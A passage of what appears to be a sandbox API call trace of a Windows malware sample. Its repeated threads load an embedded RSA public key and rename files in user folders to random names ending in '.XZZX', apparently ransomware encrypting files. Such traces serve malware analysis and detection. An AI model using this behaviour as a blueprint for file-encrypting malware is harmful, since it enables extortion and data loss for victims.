bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.121] lstrcpyW (in: lpString1=0x2baf460, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0240.121] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0240.121] SetErrorMode (uMode=0x1) returned 0x1 [0240.121] lstrcpyW (in: lpString1=0x2baf860, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0240.121] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x6c6527d7, Data2=0xfea8, Data3=0x4b6c, Data4=([0]=0xb9, [1]=0xf2, [2]=0x18, [3]=0xd4, [4]=0x5f, [5]=0x15, [6]=0x5e, [7]=0x84))) returned 0x0 [0240.121] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned 77 [0240.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0240.121] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\7FE977184B06A6E06C6527D74DC18B28.XZZX") returned 77 [0240.122] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 948 os_tid = 0x11d8 [0240.281] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.281] lstrcpyW (in: lpString1=0x2baf460, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0240.281] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.281] SetErrorMode (uMode=0x1) returned 0x1 [0240.281] lstrcpyW (in: lpString1=0x2baf860, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0240.281] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x85568fbb, Data2=0x3dc3, Data3=0x4994, Data4=([0]=0xaf, [1]=0xfa, [2]=0x38, [3]=0x9b, [4]=0x9, [5]=0x8f, [6]=0x65, [7]=0xe1))) returned 0x0 [0240.281] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned 77 [0240.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0240.281] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\312F0A7111C04FBC85568FBB147B3404.XZZX") returned 77 [0240.281] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 949 os_tid = 0x11dc [0240.433] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.433] lstrcpyW (in: lpString1=0x2baf460, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0240.433] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.433] SetErrorMode (uMode=0x1) returned 0x1 [0240.433] lstrcpyW (in: lpString1=0x2baf860, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0240.433] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x4e131252, Data2=0x3d1, Data3=0x4c06, Data4=([0]=0xa5, [1]=0xa1, [2]=0x47, [3]=0x13, [4]=0x21, [5]=0x80, [6]=0x69, [7]=0xca))) returned 0x0 [0240.433] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned 77 [0240.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0240.433] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F6C8EAF2012222E64E13125203DD072E.XZZX") returned 77 [0240.433] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 950 os_tid = 0x11e0 [0240.589] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.589] lstrcpyW (in: lpString1=0x2baf460, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0240.589] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.589] SetErrorMode (uMode=0x1) returned 0x1 [0240.589] lstrcpyW (in: lpString1=0x2baf860, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0240.590] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x4f130a78, Data2=0x6dc0, Data3=0x41ec, Data4=([0]=0xb6, [1]=0x21, [2]=0x76, [3]=0xc8, [4]=0xc0, [5]=0x6d, [6]=0xd7, [7]=0x6))) returned 0x0 [0240.590] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3DAB40862FBD462437E5810B348A2A6C.XZZX") returned 77 [0240.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0240.590] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\69BCF2001C42ED004F130A781EFDD148.XZZX") returned 77 [0240.590] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 951 os_tid = 0x11e4 [0240.745] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.745] lstrcpyW (in: lpString1=0x2baf460, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0240.746] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.746] SetErrorMode (uMode=0x1) returned 0x1 [0240.746] lstrcpyW (in: lpString1=0x2baf860, lpString2="5EF7279E2ED18E2582C79CC632E9726D.XZZX" | out: lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned="5EF7279E2ED18E2582C79CC632E9726D.XZZX" [0240.746] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xd9a38725, Data2=0x2967, Data3=0x43f1, Data4=([0]=0xbc, [1]=0x49, [2]=0xb2, [3]=0x18, [4]=0xd7, [5]=0xd, [6]=0xe3, [7]=0x5d))) returned 0x0 [0240.746] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5EF7279E2ED18E2582C79CC632E9726D.XZZX") returned 77 [0240.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0240.746] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C1704CE30AFCEEF7D9A387250DB7D33F.XZZX") returned 77 [0240.746] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 952 os_tid = 0x11e8 [0240.902] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0240.902] lstrcpyW (in: lpString1=0x2baf460, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0240.902] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0240.902] SetErrorMode (uMode=0x1) returned 0x1 [0240.902] lstrcpyW (in: lpString1=0x2baf860, lpString2="70CB960A1797B0A14EB31B321C2694E9.XZZX" | out: lpString1="70CB960A1797B0A14EB31B321C2694E9.XZZX") returned="70CB960A1797B0A14EB31B321C2694E9.XZZX" [0240.902] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x73a58d3b, Data2=0x9d77, Data3=0x422a, Data4=([0]=0xb2, [1]=0x2e, [2]=0xc7, [3]=0x8d, [4]=0x9e, [5]=0xc5, [6]=0xe1, [7]=0xbe))) returned 0x0 [0240.902] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\70CB960A1797B0A14EB31B321C2694E9.XZZX") returned 77 [0240.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0240.902] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4991D56D28B2838673A58D3B2B6D67CE.XZZX") returned 77 [0240.902] StrStrW (lpFirst="70CB960A1797B0A14EB31B321C2694E9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 953 os_tid = 0x11ec [0241.062] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.062] lstrcpyW (in: lpString1=0x2baf460, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0241.062] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.062] SetErrorMode (uMode=0x1) returned 0x1 [0241.062] lstrcpyW (in: lpString1=0x2baf860, lpString2="95567F6E0CF2434A8F3CB62A111F2792.XZZX" | out: lpString1="95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned="95567F6E0CF2434A8F3CB62A111F2792.XZZX" [0241.062] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xbd967baa, Data2=0x26f4, Data3=0x451b, Data4=([0]=0x8f, [1]=0x37, [2]=0x1f, [3]=0x4d, [4]=0x71, [5]=0x83, [6]=0x30, [7]=0x41))) returned 0x0 [0241.062] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned 77 [0241.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.062] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\09C91A080A83DFBCBD967BAA0D3EC404.XZZX") returned 77 [0241.062] StrStrW (lpFirst="95567F6E0CF2434A8F3CB62A111F2792.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 954 os_tid = 0x11f0 [0241.214] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.214] lstrcpyW (in: lpString1=0x2baf460, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0241.214] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.214] SetErrorMode (uMode=0x1) returned 0x1 [0241.214] lstrcpyW (in: lpString1=0x2baf860, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0241.214] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xa812206, Data2=0x720b, Data3=0x465c, Data4=([0]=0x9b, [1]=0x37, [2]=0x87, [3]=0xff, [4]=0xfc, [5]=0x93, [6]=0x5, [7]=0x4c))) returned 0x0 [0241.214] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned 77 [0241.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0241.214] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\F4B322421F57FDF40A8122062212E23C.XZZX") returned 77 [0241.214] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 955 os_tid = 0x11f4 [0241.370] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.370] lstrcpyW (in: lpString1=0x2baf460, lpString2="C1C4370F268A7D85910C485D2AAB61CD.XZZX" | out: lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned="C1C4370F268A7D85910C485D2AAB61CD.XZZX" [0241.370] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.370] SetErrorMode (uMode=0x1) returned 0x1 [0241.370] lstrcpyW (in: lpString1=0x2baf860, lpString2="C1C4370F268A7D85910C485D2AAB61CD.XZZX" | out: lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned="C1C4370F268A7D85910C485D2AAB61CD.XZZX" [0241.370] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xa8459b4a, Data2=0x4696, 